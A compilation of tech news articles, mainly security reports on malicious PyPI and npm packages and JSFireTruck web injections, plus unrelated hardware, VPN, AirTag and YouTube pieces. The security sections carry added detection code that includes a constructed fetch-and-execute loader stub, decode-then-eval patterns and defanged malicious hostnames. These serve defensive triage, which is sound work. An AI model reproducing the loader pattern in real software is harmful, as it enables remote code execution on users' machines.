• Malicious PyPI Package Masquerades as Chimera Module to Steal AWS, CI/CD, and macOS Data

    Jun 16, 2025Ravie LakshmananMalware / DevOps

    Cybersecurity researchers have discovered a malicious package on the Python Package Index (PyPI) repository that's capable of harvesting sensitive developer-related information, such as credentials, configuration data, and environment variables, among others.
    The package, named chimera-sandbox-extensions, attracted 143 downloads and likely targets users of a service called Chimera Sandbox, which was released by Singaporean tech company Grab last August to facilitate "experimentation and development of [machine learning] solutions."
    The package masquerades as a helper module for Chimera Sandbox, but "aims to steal credentials and other sensitive information such as Jamf configuration, CI/CD environment variables, AWS tokens, and more," JFrog security researcher Guy Korolevski said in a report published last week.
    Once installed, it attempts to connect to an external domain whose domain name is generated using a domain generation algorithm (DGA) in order to download and execute a next-stage payload.
    Specifically, the malware acquires from the domain an authentication token, which is then used to send a request to the same domain and retrieve the Python-based information stealer.

    The stealer malware is equipped to siphon a wide range of data from infected machines. This includes -

    JAMF receipts, which are records of software packages installed by Jamf Pro on managed computers
    Pod sandbox environment authentication tokens and git information
    CI/CD information from environment variables
    Zscaler host configuration
    Amazon Web Services account information and tokens
    Public IP address
    General platform, user, and host information

    The kind of data gathered by the malware shows that it's mainly geared towards corporate and cloud infrastructure. In addition, the extraction of JAMF receipts indicates that it's also capable of targeting Apple macOS systems.
    The collected information is sent via a POST request back to the same domain, after which the server assesses if the machine is a worthy target for further exploitation. However, JFrog said it was unable to obtain the payload at the time of analysis.
    "The targeted approach employed by this malware, along with the complexity of its multi-stage targeted payload, distinguishes it from the more generic open-source malware threats we have encountered thus far, highlighting the advancements that malicious packages have made recently," Jonathan Sar Shalom, director of threat research at JFrog Security Research team, said.

    "This new sophistication of malware underscores why development teams remain vigilant with updates – alongside proactive security research – to defend against emerging threats and maintain software integrity."
    The disclosure comes as SafeDep and Veracode detailed a number of malware-laced npm packages that are designed to execute remote code and download additional payloads. The packages in question are listed below -

    eslint-config-airbnb-compat (676 downloads)
    ts-runtime-compat-check (1,588 downloads)
    solders (983 downloads)
    @mediawave/lib (386 downloads)

    All the identified npm packages have since been taken down from npm, but not before they were downloaded hundreds of times from the package registry.
    SafeDep's analysis of eslint-config-airbnb-compat found that the JavaScript library has ts-runtime-compat-check listed as a dependency, which, in turn, contacts an external server defined in the former package ("proxy.eslint-proxy[.]site") to retrieve and execute a Base64-encoded string. The exact nature of the payload is unknown.
    "It implements a multi-stage remote code execution attack using a transitive dependency to hide the malicious code," SafeDep researcher Kunal Singh said.
    Solders, on the other hand, has been found to incorporate a post-install script in its package.json, causing the malicious code to be automatically executed as soon as the package is installed.
    "At first glance, it's hard to believe that this is actually valid JavaScript," the Veracode Threat Research team said. "It looks like a seemingly random collection of Japanese symbols. It turns out that this particular obfuscation scheme uses the Unicode characters as variable names and a sophisticated chain of dynamic code generation to work."
    Decoding the script reveals an extra layer of obfuscation, unpacking which reveals its main function: check if the compromised machine is Windows, and if so, run a PowerShell command to retrieve a next-stage payload from a remote server ("firewall[.]tel").
    This second-stage PowerShell script, also obscured, is designed to fetch a Windows batch script from another domain ("cdn.audiowave[.]org") and to configure a Windows Defender Antivirus exclusion list to avoid detection. The batch script then paves the way for the execution of a .NET DLL that reaches out to a PNG image hosted on ImgBB ("i.ibb[.]co").
    "[The DLL] is grabbing the last two pixels from this image and then looping through some data contained elsewhere in it," Veracode said. "It ultimately builds up in memory YET ANOTHER .NET DLL."
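    Added example (editor's code, not SafeDep's, Veracode's or the article's): a pre-install triage script that flags the three npm traits just described, an install-time lifecycle hook in package.json, a Base64 string decoded and handed to eval/Function next to a hard-coded remote host, and identifiers built from non-ASCII characters. The package.json and loader snippet it runs over are constructed stand-ins, not the real packages.

```python
"""Static pre-install triage of an npm package, run before `npm install`.

Editor's added example, not code from SafeDep, Veracode or the article.
Both sample inputs at the bottom are constructed for this demo.
"""
import json
import re

# npm runs these automatically during install, without any user action.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

B64_DECODE = re.compile(r"""Buffer\.from\([^)]*['"]base64['"]\s*\)|\batob\s*\(""")
DYN_EXEC = re.compile(r"""\beval\s*\(|\bnew\s+Function\s*\(|\bFunction\s*\(""")
# Match URL literals rather than `https.get(`: the loader below aliases the
# https module to a one-letter name, but the string literal still has to exist.
URL_LITERAL = re.compile(r"""['"]https?://([^/'"\s]+)""")
# Unicode-aware identifier: a letter or underscore followed by word characters.
IDENT = re.compile(r"[^\W\d]\w*")


def lifecycle_scripts(package_json: str) -> dict:
    """Return only the scripts npm would execute during installation."""
    scripts = json.loads(package_json).get("scripts") or {}
    return {k: v for k, v in scripts.items() if k in LIFECYCLE_HOOKS}


def non_ascii_identifier_ratio(source: str) -> float:
    """Share of identifiers that contain at least one non-ASCII character."""
    idents = IDENT.findall(source)
    if not idents:
        return 0.0
    return sum(1 for i in idents if not i.isascii()) / len(idents)


def triage(package_json: str, sources: dict, ratio_threshold: float = 0.3) -> list:
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings = []
    for hook, cmd in lifecycle_scripts(package_json).items():
        findings.append(f"package.json: '{hook}' hook runs at install time: {cmd}")
    for path, src in sources.items():
        if B64_DECODE.search(src) and DYN_EXEC.search(src):
            findings.append(f"{path}: Base64 decode feeding eval/Function (decode-then-execute)")
        for host in sorted(set(URL_LITERAL.findall(src))):
            findings.append(f"{path}: hard-coded remote host {host}")
        ratio = non_ascii_identifier_ratio(src)
        if ratio > ratio_threshold:
            findings.append(f"{path}: {ratio:.0%} of identifiers are non-ASCII (likely obfuscation)")
    return findings


# Constructed package.json showing the postinstall trait.
SAMPLE_PACKAGE_JSON = """{
  "name": "example-compat-check",
  "version": "1.0.0",
  "scripts": {"postinstall": "node index.js"}
}"""

# Constructed loader skeleton mirroring the described traits; the host is a
# reserved .invalid name and nothing is served, so it does nothing if run.
SAMPLE_INDEX_JS = """
const あ = require('https');
const い = (う) => Buffer.from(う, 'base64').toString('utf8');
あ.get('https://example.invalid/p', (え) => {
  let お = '';
  え.on('data', (か) => { お += か; });
  え.on('end', () => { new Function(い(お))(); });
});
"""

if __name__ == "__main__":
    for line in triage(SAMPLE_PACKAGE_JSON, {"index.js": SAMPLE_INDEX_JS}):
        print(line)
```

    Run it against an unpacked tarball (`npm pack` output) before the package ever reaches `npm install`; any finding is a reason to block the install and read the code by hand.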

    Furthermore, the DLL is equipped to create task scheduler entries and features the ability to bypass user account control (UAC) using a combination of FodHelper.exe and programmatic identifiers (ProgIDs) to evade defenses and avoid triggering any security alerts to the user.
    The newly-downloaded DLL is Pulsar RAT, a "free, open-source Remote Administration Tool for Windows" and a variant of the Quasar RAT.
    "From a wall of Japanese characters to a RAT hidden within the pixels of a PNG file, the attacker went to extraordinary lengths to conceal their payload, nesting it a dozen layers deep to evade detection," Veracode said. "While the attacker's ultimate objective for deploying the Pulsar RAT remains unclear, the sheer complexity of this delivery mechanism is a powerful indicator of malicious intent."
    Crypto Malware in the Open-Source Supply Chain
    The findings also coincide with a report from Socket that identified credential stealers, cryptocurrency drainers, cryptojackers, and clippers as the main types of threats targeting the cryptocurrency and blockchain development ecosystem.

    Some of the examples of these packages include -

    express-dompurify and pumptoolforvolumeandcomment, which are capable of harvesting browser credentials and cryptocurrency wallet keys.
    bs58js, which drains a victim's wallet and uses multi-hop transfers to obscure theft and frustrate forensic tracing.
    lsjglsjdv, asyncaiosignal, and raydium-sdk-liquidity-init, which function as clippers that monitor the system clipboard for cryptocurrency wallet strings and replace them with threat actor-controlled addresses to reroute transactions to the attackers.

    "As Web3 development converges with mainstream software engineering, the attack surface for blockchain-focused projects is expanding in both scale and complexity," Socket security researcher Kirill Boychenko said.
    "Financially motivated threat actors and state-sponsored groups are rapidly evolving their tactics to exploit systemic weaknesses in the software supply chain. These campaigns are iterative, persistent, and increasingly tailored to high-value targets."
    AI and Slopsquatting
    The rise of artificial intelligence (AI)-assisted coding, also called vibe coding, has unleashed another novel threat in the form of slopsquatting, where large language models (LLMs) can hallucinate non-existent but plausible package names that bad actors can weaponize to conduct supply chain attacks.
    Trend Micro, in a report last week, said it observed an unnamed advanced agent "confidently" cooking up a phantom Python package named starlette-reverse-proxy, only for the build process to crash with the error "module not found." However, should an adversary upload a package with the same name on the repository, it can have serious security consequences.

    Furthermore, the cybersecurity company noted that advanced coding agents and workflows such as Claude Code CLI, OpenAI Codex CLI, and Cursor AI with Model Context Protocol (MCP)-backed validation can help reduce, but not completely eliminate, the risk of slopsquatting.
    "When agents hallucinate dependencies or install unverified packages, they create an opportunity for slopsquatting attacks, in which malicious actors pre-register those same hallucinated names on public registries," security researcher Sean Park said.
    "While reasoning-enhanced agents can reduce the rate of phantom suggestions by approximately half, they do not eliminate them entirely. Even the vibe-coding workflow augmented with live MCP validations achieves the lowest rates of slip-through, but still misses edge cases."
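    Added example (editor's code, not Trend Micro's, JFrog's or the article's): an install gate for dependency names an agent proposes. It normalizes each name the way PyPI does (PEP 503), accepts names already approved in an allowlist or lockfile, rejects names that are not published at all as probable hallucinations, and quarantines published names that are young, barely downloaded or a suffix-extension of an approved package, which covers both the starlette-reverse-proxy shape and the 143-download chimera-sandbox-extensions shape. The allowlist, thresholds and registry metadata are constructed; a real gate would fetch the metadata live.

```python
"""Install gate for dependency names proposed by a coding agent.

Editor's added example, not from Trend Micro, JFrog or the article.
All registry metadata below is constructed; a real gate would fetch it live.
"""
import re

ALLOWLIST = {"starlette", "fastapi", "requests", "uvicorn"}   # constructed approved set

# Constructed metadata: age in days and 30-day downloads, as a registry API might report.
REGISTRY = {
    "chimera-sandbox-extensions": {"age_days": 30, "downloads_30d": 143},
}
# Constructed "after the squat" view: the hallucinated name has been pre-registered.
SQUATTED_REGISTRY = {
    "starlette-reverse-proxy": {"age_days": 2, "downloads_30d": 12},
}
MIN_AGE_DAYS = 90          # constructed policy thresholds
MIN_DOWNLOADS_30D = 1000

_REQ_NAME = re.compile(r"^\s*([A-Za-z0-9](?:[A-Za-z0-9._-]*[A-Za-z0-9])?)")


def normalize(name: str) -> str:
    """PEP 503: lowercase and collapse runs of '-', '_' and '.' into one hyphen."""
    return re.sub(r"[-_.]+", "-", name).lower()


def requirement_name(line: str) -> str:
    """Strip version specifiers/extras from a requirements line ('Starlette>=0.30' -> 'starlette')."""
    m = _REQ_NAME.match(line)
    if not m:
        raise ValueError(f"not a requirement: {line!r}")
    return normalize(m.group(1))


def decide(line: str, registry: dict = REGISTRY, allowlist: set = ALLOWLIST) -> tuple:
    """Return (verdict, normalized_name, reason); verdict is allow, reject or quarantine."""
    name = requirement_name(line)
    if name in allowlist:
        return ("allow", name, "approved in allowlist/lockfile")
    meta = registry.get(name)
    if meta is None:
        return ("reject", name, "not published on the registry: probable hallucinated name")
    reasons = []
    if meta["age_days"] < MIN_AGE_DAYS:
        reasons.append(f"published only {meta['age_days']} days ago")
    if meta["downloads_30d"] < MIN_DOWNLOADS_30D:
        reasons.append(f"only {meta['downloads_30d']} downloads in 30 days")
    extended = sorted(a for a in allowlist if name.startswith(a + "-"))
    if extended:
        reasons.append(f"extends the approved name {extended[0]!r} with a suffix")
    if reasons:
        return ("quarantine", name, "; ".join(reasons))
    return ("allow", name, "published, established and widely used")


def gate(requirements: list, registry: dict = REGISTRY) -> bool:
    """True only if every line is allowed; the caller refuses to install otherwise."""
    return all(decide(r, registry)[0] == "allow" for r in requirements)


if __name__ == "__main__":
    for req in ["Starlette>=0.30", "starlette-reverse-proxy", "chimera-sandbox-extensions"]:
        print(decide(req))
    # The same hallucinated name after an adversary pre-registers it.
    print(decide("starlette-reverse-proxy", SQUATTED_REGISTRY))
```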

    THEHACKERNEWS.COM
  • 6 Years to Make a Fan, G370A Budget Case, & Phanteks Technical Fan Discussion, ft. CTO

    Cases News | June 9, 2025 | Last Updated: 2025-06-09
    We cover Phanteks' new G370A budget case, the XT M3, and the Evolv X2 Matrix.

    The Highlights
    Phanteks' new X2 Matrix case has 900 LEDs and is aiming to be around
    Phanteks' G370A is a case that includes 3x120mm fans
    The company has a new T30-140 fan that required 6 years of engineering to make

    Intro
    We visited Phanteks' suite at Computex 2025 and the company showed off several cases along with a fan that took the company roughly 6 years to make.
    Editor's note: This was originally published on May 21, 2025 as a video. This content has been adapted to written format for this article and is unchanged from the original publication.

    Credits
    Host: Steve Burke
    Camera, Video Editing: Mike Gaglione, Vitalii Makhnovets
    Writing, Web Editing: Jimmy Thang

    Phanteks Matrix Cases
    We've talked about Phanteks' X2 case in the past, but the company was showing off its new Matrix version, which has matrix LEDs. The X2 Matrix has 900 LEDs in a 10x90 layout. It's supposed to be about to more expensive than the base X2, which means it should end up around
    The interesting thing about the case is that the LEDs wrap around the chassis. In terms of communication, the LEDs connect to the motherboard via USB 2.0 and use SATA for power. This allows Phanteks to bypass a WinRing0-type situation. Another Matrix case had 600 of them in a 10x60 LED configuration and is supposed to be about
    Phanteks also has software that allows you to reconfigure what the LEDs display. When we got to the company's suite, it had been programmed to say, "Gamers Nexus here," which was cool to see. We also saw that the LEDs can also be used to highlight CPU temperature.

    Phanteks G370A
    Phanteks also showed off its G370A case, which is a case that includes 3x120mm fans in the front coupled with a mesh front that offers 38% hole porosity. The company tells us that manufacturing typically offers around 25% porosity. It has a glass side panel, and the back side panel of the case is just steel and has no ventilation.
    Taking a look at the placement of the front fans, we asked Phanteks why they weren't higher on the case so the bottom fan could get more exposure to the bottom power supply shroud area, and the answer the company gave us was simply clearance for a 360mm radiator at the top. There's not a lot of room for the air coming into the shroud. Some of it will go through the cable pass-through if it's empty. The back of the case features a drive mount.

    XTM3
    The company also showed off a Micro ATX case called the XTM3. It comes with 3 fans and is
    For its front panel, it has a unique punch-out for its fans. The top panel is part standard ventilation, but it does have one side that provides less airflow, which covers where the PSU would exhaust out of. The side panel does have punch-outs for the PSU, however. We don't test power supplies, though that may change in the future. Power supplies can take a lot of thermal abuse, however, so we're not super concerned here.
    The case should be shipping in the next month or so and is 39.5 liters, which includes the feet. We appreciate that, as not a lot of companies will factor that in. There's also a lot of cable management depth on the back, and the case also supports BTF. In addition, there's a panel that clamps down all of the power supply cables.

    T30 Fan
    Phanteks' T30 fan took the company 6 years to make and is a 140mm fan. The company is competing with Noctua in the high-end fan space, but is going for a grey theme instead of brown.

    Phanteks CTO Tenzin Rongen Interview
    Finally, we interviewed Phanteks CTO Tenzin Rongen to discuss technical details behind the company's long-developed fans. Make sure to check it out in our video.
    GAMERSNEXUS.NET
    6 Years to Make a Fan, G370A Budget Case, & Phanteks Technical Fan Discussion, ft. CTO
    Cases News 6 Years to Make a Fan, G370A Budget Case, & Phanteks Technical Fan Discussion, ft. CTOJune 9, 2025Last Updated: 2025-06-09We cover Phanteks’ new G370A budget case, the XT M3, and the Evolv X2 MatrixThe HighlightsPhanteks’ new X2 Matrix case has 900 LEDs and is aiming to be around $200Phanteks’ G370A is a $60 case that includes 3x120mm fansThe company has a new T30-140 fan that required 6 years of engineering to makeTable of ContentsAutoTOC Grab a GN Tear-Down Toolkit to support our AD-FREE reviews and IN-DEPTH testing while also getting a high-quality, highly portable 10-piece toolkit that was custom designed for use with video cards for repasting and water block installation. Includes a portable roll bag, hook hangers for pegboards, a storage compartment, and instructional GPU disassembly cards.IntroWe visited Phanteks’ suite at Computex 2025 and the company showed off several cases along with a fan that took the company roughly 6 years to make.Editor's note: This was originally published on May 21, 2025 as a video. This content has been adapted to written format for this article and is unchanged from the original publication.CreditsHostSteve BurkeCamera, Video EditingMike GaglioneVitalii MakhnovetsWriting, Web EditingJimmy ThangPhanteks Matrix CasesWe’ve talked about Phanteks’ X2 case in the past but the company was showing off its new Matrix version, which has matrix LEDs. The X2 Matrix has 900 LEDs in a 10x90 layout. It’s supposed to be about $30 to $40 more expensive than the base X2, which means it should end up around $200.  The interesting thing about the case is that the LEDs wrap around the chassis. In terms of communication, the LEDs connect to the motherboard via USB 2.0 and use SATA for power. This allows Phanteks to bypass a WinRing 0 type situation. Another Matrix case had 600 of them in a 10x60 LED configuration and is supposed to be about $120. Phanteks also has software that allows you to reconfigure what the LEDs display. 
When we got to the company’s suite, it had been programmed to say, “Gamers Nexus here,” which was cool to see. We also saw that the LEDs can also be used to highlight CPU temperature. Phanteks G370A Grab a GN15 Large Anti-Static Modmat to celebrate our 15th Anniversary and for a high-quality PC building work surface. The Modmat features useful PC building diagrams and is anti-static conductive. Purchases directly fund our work! (or consider a direct donation or a Patreon contribution!)Phanteks also showed off its G370A case, which is a $60 case that includes 3x120mm fans in the front coupled with a mesh front that offers 38% hole porosity. The company tells us that manufacturing typically offers around 25% porosity.  It has a glass side panel and the back side panel of the case is just steel and has no ventilation. Taking a look at the placement of the front fans, we asked Phanteks why they weren’t higher on the case so the bottom fan could get more exposure to the bottom power supply shroud area and the answer the company gave us was simply clearance for a 360mm radiator at the top. There’s not a lot of room for the air coming into the shroud. Some of it will go through the cable pass-through if it’s empty. The back of the case features a drive mount.XTM3The company also showed off a Micro ATX case called the XTM3. It comes with 3 fans and is $70. For its front panel, it has a unique punch out for its fans. The top panel is part standard ventilation but it does have one side that provides less airflow, which covers where the PSU would exhaust out of. The side panel does have punch-outs for the PSU, however. We don’t test power supplies, though that may change in the future. Power supplies can take a lot of thermal abuse, however, so we’re not super concerned here.  The case should be shipping in the next month or so and is 39.5 liters, which includes the feet. We appreciate that as not a lot of companies will factor that in. 
There’s also a lot of cable management depth on the back and the case also supports BTF. In addition, there’s a panel that clamps down all of the power supply cables. T30 FanPhanteks’ T30 fan took the company 6 years to make and is a 140mm fan. The company is competing with Noctua in the high-end fan space, but is going for a grey theme instead of brown. Phanteks CTO Tenzin Rongen Interview Visit our Patreon page to contribute a few dollars toward this website's operation (or consider a direct donation or buying something from our GN Store!) Additionally, when you purchase through links to retailers on our site, we may earn a small affiliate commission.Finally, we interviewed Phanteks CTO Tenzin Rongen to discuss technical details behind the company’s long-developed fans. Make sure to check it out in our video.
  • How to watch USA vs. Trinidad and Tobago online for free

    Credit: Seth Herald/AFP via Getty Images

    TL;DR: Live stream USA vs. Trinidad and Tobago in the 2025 Concacaf Gold Cup for free on YouTube. Access this free live stream from anywhere in the world with ExpressVPN.

    The 2025 Concacaf Gold Cup is starting with a number of really interesting fixtures, including USA vs. Trinidad and Tobago. Things have been pretty rough for USA recently, but they'll be hoping to start afresh in this special tournament. The opening game against Trinidad and Tobago is going to be tricky, but USA will be confident of progressing through the group stage. If you want to watch USA vs. Trinidad and Tobago in the 2025 Concacaf Gold Cup for free from anywhere in the world, we have all the information you need.

    When is USA vs. Trinidad and Tobago?
    USA vs. Trinidad and Tobago in the 2025 Concacaf Gold Cup kicks off at 6 p.m. ET on June 15. This fixture takes place at PayPal Park.

    How to watch USA vs. Trinidad and Tobago for free
    USA vs. Trinidad and Tobago in the 2025 Concacaf Gold Cup is available to live stream for free on YouTube. This free live stream is not available in North or Central America, but fans in excluded territories can still watch this game for free with a VPN. These tools can hide your real IP address (digital location) and connect you to a secure server in another location, meaning you can unblock free live streams of the Concacaf Gold Cup from anywhere in the world.

    Live stream the 2025 Concacaf Gold Cup for free by following these simple steps:
    Subscribe to a streaming-friendly VPN (like ExpressVPN)
    Download the app to your device of choice (the best VPNs have apps for Windows, Mac, iOS, Android, Linux, and more)
    Open up the app and connect to a server in the UK
    Visit YouTube
    Live stream the 2025 Concacaf Gold Cup for free from anywhere in the world

    ExpressVPN (1-Month Plan): $12.95, only at ExpressVPN (with money-back guarantee)

    The best VPNs for streaming are not free, but most do offer free trials or money-back guarantees. By leveraging these offers, you can watch the 2025 Concacaf Gold Cup without actually spending anything. This clearly isn't a long-term solution, but it does give you enough time to stream USA vs. Trinidad and Tobago (plus the rest of the tournament) before recovering your investment. If you want to retain permanent access to the best free streaming services from around the world, you'll need a subscription. Fortunately, the best VPN for streaming live sport is on sale for a limited time.

    What is the best VPN for YouTube?
    ExpressVPN is the best service for bypassing geo-restrictions to stream live sport on YouTube, for a number of reasons:
    Servers in 105 countries
    Easy-to-use app available on all major devices including iPhone, Android, Windows, Mac, and more
    Strict no-logging policy so your data is always secure
    Fast connection speeds
    Up to eight simultaneous connections
    30-day money-back guarantee

    A two-year subscription to ExpressVPN is on sale for $139 and includes an extra four months for free — 61% off for a limited time. This plan also includes a year of free unlimited cloud backup and a generous 30-day money-back guarantee. Alternatively, you can get a one-month plan for just $12.95 (including money-back guarantee). Live stream the 2025 Concacaf Gold Cup for free with ExpressVPN.

    Joseph Green
    Global Shopping Editor
    Joseph Green is the Global Shopping Editor for Mashable. He covers VPNs, headphones, fitness gear, dating sites, streaming, and shopping events like Black Friday and Prime Day. Joseph is also Executive Editor of Mashable's sister site, AskMen.
  • London Couple Tracks Down And Recovers £46,000 Jaguar Using Hidden AirTag After Police Fail To Act On Real-Time Location Of Stolen Vehicle

    Ali Salman • Jun 14, 2025 at 06:08pm EDT

    Apple's AirTag accessory is becoming more than just a way to find lost keys with its advanced tracking system. The accessory is unexpectedly becoming a hero when it comes to recovering stolen vehicles. In a new real-world case that highlights the AirTag's precision tracking, a London-based couple successfully located and recovered their £46,000 Jaguar E-Pace, while the police failed to take immediate action despite having real-time location data.

    A couple used an AirTag to track their stolen Jaguar and recovered it themselves after police delayed their response.

    The incident took place on June 3 in Brook Green, Hammersmith, where the couple's Jaguar was stolen from their home (via MacMagazine). Little did the thieves know, the vehicle had an AirTag stashed inside it, which led the couple to the location of their car in a nearby neighborhood, Chiswick. The AirTag did its job quite well and provided the couple with the location of their stolen vehicle, which was then forwarded to the Metropolitan Police. Even after the police had the location of the stolen Jaguar, the response was not what the couple was expecting.

    The owner of the vehicle told BBC News:
    “I wanted to act quite quickly as my fear was that we would find the AirTag and not the car when it was discarded on to the street without the car, so I told them that we were planning to head to the location.”

    Instead of taking action and sending backup right there and then, the police merely acknowledged the risky plan and advised the couple to call again if needed. The couple decided to go to the location by themselves, which was a risky move. They found the car parked on a residential street, and after bypassing the remote security systems, the couple was able to remotely unlock the car and recover it successfully.

    In a statement shared by the Metropolitan Police: “This investigation is ongoing, and officers met the victim on Tuesday, 10 June, as part of their inquiries.” While the story ends with a win for the victims and for the AirTag, it does raise questions about police responsiveness in technology-assisted theft cases. Apple has never marketed the AirTag as an anti-theft device; instead, it warns users not to attempt to recover stolen property themselves due to potential safety risks.

    All in all, we are glad that the stolen car was recovered and the couple was safe by the end of the day. Moreover, stories like these also highlight the growing role of smart tracking accessories in the personal security space, alongside the growing need for authorities to take measures accordingly.
  • YouTube might slow down your videos if you block ads

    It’s fairly easy to block the constant, incessant advertising that appears on YouTube. Google would prefer that you don’t, or pay upto make them go away. Last weekend, the company started its latest campaign to try and badger ad-block users into disabling their extensions. Since then, it looks like YouTube has escalated things and is now intentionally slowing down videos.
    Posters on Reddit and the Brave browser forum have observed videos being blacked out on first load, approximately for the length of pre-roll ads, with a pop-up link that directs users to the ad-blocking section of this technical support page. “Check whether your browser extensions that block ads are affecting video playback,” suggests Google. “As another option, try opening YouTube in an incognito window with all extensions disabled and check if the issue continues.” PCWorld staff has seen this in action, using uBlock Origin Lite.
    Google
    Ad-block extension developers quickly got around the pop-up issue earlier this week, with one AdGuard representative calling the process “a classic cat-and-mouse game.” But if Google wanted to instigate a more serious crackdown on users blocking ads without paying up, it could do so easily—and we’ve seen it pull this same move before. Posters on the latest issue speculate that the slowdowns might be tagged to specific Google or YouTube user accounts that were detected blocking ads previously, which would bypass any kind of interaction with a specific browser or extension.
    I can’t independently confirm that’s happening, but it wouldn’t surprise me. It also wouldn’t shock me if Google is seeing a larger percentage of YouTube users blocking advertising, as is the case all across the web, as the quantity of advertising rises while quality takes a nosedive. YouTube video creators are having to get, well, creative to seek alternate revenue beyond basic AdSense accounts, as sponsored videos are now constant across the platform and more channels put new videos behind paywalls on YouTube itself or via other platforms like Patreon.

    YouTube is attacking the issue from other angles as well. Tech-focused creators that show how to use third-party tools to block ads or download videos from the siteare getting their videos taken down and their accounts flagged, for violation of the extremely vague policy around “harmful and dangerous content.”
    If I may editorialize a bit: Google, if you want more people to subscribe to YouTube Premium and remove advertising, you need to make it cheaper. Charging $14 per month just to get rid of ads is the same cost as a premium subscription from other sources where users can watch full movies and series. YouTube as a platform is a much lower bar and just doesn’t compete at that level. I’m not going to pay that much to get rid of ads, not when it doesn’t actually get rid of all the ads—those sponsored and subscriber-only videos are still all over the place—and the site is filling up with AI slop. “Premium Lite,” which neuters the offerings for mobile and music-focused users, doesn’t make the cut either.
    And to be clear, I have no problem paying for the stuff I watch. I already pay more than $15 a month to support the individual YouTube channels I enjoy, like Second Wind, Drawfee, and several tech podcasts. But I do it via Patreon because sending that money through YouTube feels gross. If Google wants people to pay up, it needs to lower the price enough so that it’s no longer worth the hassle of blocking them.
    It’s a lesson that the music, movie, and game industries learned a long time ago as they fought the initial wave of internet piracy… and now seem to be forgetting again.
  • Over 269,000 Websites Infected with JSFireTruck JavaScript Malware in One Month

    Jun 13, 2025Ravie LakshmananWeb Security / Network Security

    Cybersecurity researchers are calling attention to a "large-scale campaign" that has been observed compromising legitimate websites with malicious JavaScript injections.
    According to Palo Alto Networks Unit 42, these malicious injections are obfuscated using JSFuck, which refers to an "esoteric and educational programming style" that uses only a limited set of characters to write and execute code.
    The cybersecurity company has given the technique the alternate name JSFireTruck, owing to the profanity in the original name.
    "Multiple websites have been identified with injected malicious JavaScript that uses JSFireTruck obfuscation, which is composed primarily of the symbols [, ], +, $, {, and }," security researchers Hardik Shah, Brad Duncan, and Pranay Kumar Chhaparwal said. "The code's obfuscation hides its true purpose, hindering analysis."

    Further analysis has determined that the injected code is designed to check the website referrer ("document.referrer"), which identifies the address of the web page from which a request originated.
    Should the referrer be a search engine such as Google, Bing, DuckDuckGo, Yahoo!, or AOL, the JavaScript code redirects victims to malicious URLs that can deliver malware, exploits, traffic monetization, and malvertising.

    Unit 42 said its telemetry uncovered 269,552 web pages that have been infected with JavaScript code using the JSFireTruck technique between March 26 and April 25, 2025. A spike in the campaign was first recorded on April 12, when over 50,000 infected web pages were observed in a single day.
    "The campaign's scale and stealth pose a significant threat," the researchers said. "The widespread nature of these infections suggests a coordinated effort to compromise legitimate websites as attack vectors for further malicious activities."
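    As an added example (not Unit 42's code, and not the injected script itself), the helpers below give an analyst a cheap way to work with the two behaviours described above: a density score over the six symbols that dominate JSFireTruck output, and a reconstruction of the referrer gate, which matters because a sandbox that opens an infected page directly, with an empty document.referrer, never triggers the redirect. The search-engine host patterns, the 0.6 density threshold and the 200-character length floor are assumptions, and every sample string is constructed.

```javascript
// Added example: analyst-side helpers for JSFireTruck-style injections.
// Not Unit 42's code; thresholds and host patterns are assumptions.

// The six symbols Unit 42 lists as dominating the obfuscated code. A few of
// the primitives such an alphabet yields, which is why it is enough to
// bootstrap arbitrary JavaScript:
//   []+{}       -> "[object Object]"   (letters o,b,j,e,c,t plus "[" and " ")
//   [][[]]+[]   -> "undefined"         (letters u,n,d,e,f,i)
//   +[]         -> 0                   (an index into the strings above)
const JSFIRETRUCK_SYMBOLS = new Set(["[", "]", "+", "$", "{", "}"]);

// Fraction of non-whitespace characters drawn from that alphabet.
// Ordinary minified JS sits well below 0.3; JSFuck-family output is near 1.0.
function symbolDensity(source) {
  let total = 0;
  let hits = 0;
  for (const ch of source) {
    if (/\s/.test(ch)) continue;
    total += 1;
    if (JSFIRETRUCK_SYMBOLS.has(ch)) hits += 1;
  }
  return total === 0 ? 0 : hits / total;
}

// Flag a script block as JSFireTruck-like. The length floor keeps short
// legitimate snippets such as "x = a[i] + b[j];" from firing.
function looksObfuscated(source, threshold = 0.6, minLength = 200) {
  return source.length >= minLength && symbolDensity(source) >= threshold;
}

// Referrer gate as Unit 42 describes it: only visitors arriving from one of
// these search engines are redirected. Patterns are an assumption; they allow
// subdomains and the common regional TLD forms (google.co.uk, yahoo.co.jp).
const SEARCH_ENGINE_PATTERNS = [
  /(^|\.)google\.[a-z]{2,3}(\.[a-z]{2})?$/,
  /(^|\.)bing\.com$/,
  /(^|\.)duckduckgo\.com$/,
  /(^|\.)yahoo\.[a-z]{2,3}(\.[a-z]{2})?$/,
  /(^|\.)aol\.[a-z]{2,3}(\.[a-z]{2})?$/,
];

function isSearchEngineReferrer(referrer) {
  if (!referrer) return false; // direct visit, or Referrer-Policy stripped it
  let host;
  try {
    host = new URL(referrer).hostname.toLowerCase();
  } catch (e) {
    return false; // not a URL at all
  }
  return SEARCH_ENGINE_PATTERNS.some((re) => re.test(host));
}

// What the injected code decides for a visitor: "redirect" to the attacker
// URL, or "stay" and render the legitimate page, which is all a sandbox sees
// when it loads the page with no referrer.
function injectedPageAction(referrer) {
  return isSearchEngineReferrer(referrer) ? "redirect" : "stay";
}

// Constructed samples: a JSFuck-family fragment repeated to script length,
// and an ordinary click handler for comparison.
const SAMPLE_OBFUSCATED = "$$=[]+{};$$[+[]]+[][[]]+[];".repeat(12);
const SAMPLE_BENIGN =
  'function init(){document.getElementById("x").addEventListener("click",function(){console.log("hi");});}'.repeat(3);
```

    When replaying an infected page in a sandbox, set the Referer header (or navigate from a search result page) to a host that the gate accepts; with an empty referrer the script stays dormant and the capture shows only the clean site.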
    Say Hello to HelloTDS
    The development comes as Gen Digital took the wraps off a sophisticated Traffic Distribution Service (TDS) called HelloTDS that's designed to conditionally redirect site visitors to fake CAPTCHA pages, tech support scams, fake browser updates, unwanted browser extensions, and cryptocurrency scams through remotely-hosted JavaScript code injected into the sites.
    The primary objective of the TDS is to act as a gateway, determining the exact nature of content to be delivered to the victims after fingerprinting their devices. If the user is not deemed a suitable target, the victim is redirected to a benign web page.

    "The campaign entry points are infected or otherwise attacker-controlled streaming websites, file sharing services, as well as malvertising campaigns," researchers Vojtěch Krejsa and Milan Špinka said in a report published this month.
    "Victims are evaluated based on geolocation, IP address, and browser fingerprinting; for example, connections through VPNs or headless browsers are detected and rejected."
